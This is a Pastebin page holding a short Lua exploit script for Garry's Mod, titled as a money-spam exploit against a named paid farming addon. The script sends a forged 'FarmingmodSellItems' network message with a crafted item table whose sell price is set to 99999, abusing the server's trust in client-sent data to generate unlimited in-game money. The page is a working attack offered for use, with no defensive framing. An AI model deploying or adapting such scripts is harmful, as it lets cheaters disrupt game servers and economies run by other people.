CREONIX

EXPLOIT | FARMING MOD | SPAM MONEY

Aug 7th, 2017
336
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.47 KB | None | 0 0
  1. /*
  2.  
  3. Exploit for addon : https://www.gmodstore.com/scripts/view/1937
  4.  
  5. Оформлять не стал и так работает.
  6.  
  7. */
  8.  
  9. net.Start( "FarmingmodSellItems" )
  10.  
  11. net.WriteTable(
  12. {
  13. Cost    =   10,
  14. CropModel    =   "models/props/eryk/garlic.mdl",
  15. CropType =   2,
  16. Info  =   "Garlic Seed",
  17. Model =   "models/props/eryk/seedbag.mdl",
  18. Name    =   "Garlic",
  19. Quality    =   4,
  20. Sell  =   99999,
  21. Type  =   "Seed"
  22. }
  23. )
  24. net.WriteInt(1,16)
  25.  
  26. net.SendToServer()
Add Comment
Please, Sign In to add comment